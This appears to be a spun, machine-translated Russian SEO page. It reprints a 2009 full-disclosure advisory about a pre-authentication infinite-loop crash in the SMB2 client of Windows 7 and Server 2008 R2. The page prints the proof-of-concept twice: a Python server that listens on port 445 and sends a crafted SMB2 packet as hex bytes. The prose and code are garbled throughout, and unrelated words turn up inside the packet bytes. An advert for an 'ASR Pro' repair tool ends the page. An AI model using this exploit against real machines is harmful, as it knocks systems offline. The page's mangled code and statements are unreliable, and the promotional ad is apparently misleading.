Table of Contents
Одобрено
Если на ваш компьютер падает удаленное ядро Windows 7 на Server 2008r2, мы надеемся, что руководство пользователя поможет вам успешно решить эту проблему. грамм.Полезно для Microsoft Windows / Server 2008 R2 SMB Client Infinite Loop: он использует повреждение для выполнения операций в SMB-клиенте Microsoft Windows в Windows, а также в Windows Server 2008 R2. В основном это дает сбой удаленного ядра. Metasploit Framework содержит модуль, который поможет использовать мою уязвимость.
грамм.
#! / usr / bin или питон# win7-crash.Trigger py:# удаленные аварии ядра на хост-сервере Win7 в сочетании с 2008R2 (бесконечный цикл)# KeAccumulateTicks () вылетает, вы заплатите NT_ASSERT () / DbgRaiseAssertionFailure (), вызванные мощным# Бесконечный цикл.# НЕТ BSOD, ВЫ ДОЛЖНЫ ОТСОЕДИНИТЬ РАЗЪЕМ.# Чтобы вызвать это быстро; в select: this_script_ip_addr BLAH, проверка столкновений выполняется без особых усилий# Автор: Лоран Гаффи ¯ ¿ ½Импортировать сервер сокетовПакет равен (длина числа " x00 x00 x00 x9a" ---> требование должно быть 9-м, а не 9a .." xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00"" x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41"" xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00"" x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01"" xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20"" x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e"" x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a")Сеанс SMB2 (SocketServer.BaseRequestHandler): Деф-Хэндл (сама): печать "Кто:", self.client_address Используйте "СПАСИБО SDL" Запись подразумевает self.request.recv (1024) self.request.send (пакет) self.request.close ()запуск равен SocketServer.TCPServer (('', 445), SMB2) # слушать на всех интерфейсах city 445launch.serve_forever ()
Эта ошибка является важным свидетельством того, что SDL FAIL
Целью ошибки является бесконечный цикл на smb1,2, предварительная аутентификация, учетные данные точно не требуются …
Может быть запущен в локальной сети с помощью (IE *)
Ошибка, вероятно, позволит им быть настолько простыми, что поощряется обнаружение через 2 года назад с помощью определенного SDL, если какой-либо SDL уже существовал:
netbios_header подразумевает struct.pack (“> i”, len (”. подписаться на (SMB_packet)) + SMB_packet
(Термины netbios h2 указывают длину дополнительного пакета smb1,2.)
Если сотовый номер netbios_header на 4 байта меньше или больше SMB_packet, ситуация, естественно, нарушается!
КАКИЕ ?? Ты что, шутишь, где мой SDL?!?
«Самый безопасный рабочий подиум на свет. Е»;
То, что ваш удивительно правильный брандмауэр настроен, вероятно, следует удалить через IE, даже с помощью метода вещания nbns (без настраиваемого взаимодействия)
================================================
– Дата выпуска: 11 ноября 2009 г.
– Обнаружил: Лоран Гаффье
– Уровень серьезности: средний / высокий
==============================================
NS. ПОДТВЕРЖДЕНИЕ КОНЦЕПЦИИ
————————–
# win7-crash.py:
# Запуск реального удаленного компьютера помогает сбой ядра под Win7 и конечный результат Server 2008R2 (бесконечный цикл)
# KeAccumulateTicks () аварийно завершил работу из-за NT_ASSERT () / DbgRaiseAssertionFailure (), вызванного сильным бесконечным циклом числа.
# НЕТ BSOD, У ВАС ЕСТЬ ПРОБКА.
# Чтобы вызвать это быстро; по порядку: this_script_ip_addr BLAH, сразу уменьшите
# Автор: Лоран Гаффье
#
Пакет подразумевает (число ” x00 x00 x00 x9a” —> пятая длина действительно должна быть 9a ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson xperia x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)
V. КОММЕРЧЕСКОЕ ВОЗДЕЙСТВИЕ
————————–
Злоумышленник может удаленно выключить любой сервер Windows 2008R2 Server 7 –
в локальной сети или предоставляется IE
Vii. Патч-решение
————————–
возможно, недоступен для этого случая, индивидуальному интернет-провайдеру все равно.
Закройте возможности SMB и порты до тех пор, пока не будет обеспечен достоверный аудит.
X. ИСТОРИЯ ИЗМЕНЕНИЙ
————————–
8 ноября 2009 г .: MSRC связалась с
8 ноября 2009 г .: MSRC обнаружила уязвимость
11 ноября 2009 г .: MRSC пытается убедить меня, потому что есть отличная ошибка IPv6 от различных поставщиков, которая не должна появляться на плакатах по безопасности.
11 ноября 2009 г .: Это ценное насекомое было выпущено на волю.
XI. ПРИМЕЧАНИЯ
————————–
Юридическая информация, содержащаяся в отдельном уведомлении, предоставляется «как есть»
без заявлений или гарантий целесообразности, кроме них.
Я не принимаю убытки по вине оператора в качестве альтернативы
Неправильное использование этой информации.
Полное раскрытие информацииАрхивы списков рассылки
<размер диапазона равен "+ 2"> Ошибка удаленного ядра Windows 5 Server 2008R2<время>От: laurent gaffie
Дата: gmail среда, 11 ноября 2009 г., 05:58:44 – 05:00
<время>
________________________________________________ПолМое раскрытие всей информации - доверяю прямо сейчас.Устав: http://lists.grok.org.uk/full-disclosure-charter.htmlТолько что опубликовано и спонсировано Secunia Http: // secunia-.com/
<время>
по дате по Проволока
<размер диапазона означает "+ 1"> Текущий поток:
- Сбой мощного удаленного ядра Windows Server 2008R2, автор – Лоран Гаффи (11 ноября).
Одобрено
Инструмент восстановления ASR Pro — это решение для ПК с Windows, который работает медленно, имеет проблемы с реестром или заражен вредоносным ПО. Этот мощный и простой в использовании инструмент может быстро диагностировать и исправлять ваш компьютер, повышая производительность, оптимизируя память и улучшая безопасность в процессе. Больше не страдайте от вялости компьютера - попробуйте ASR Pro сегодня!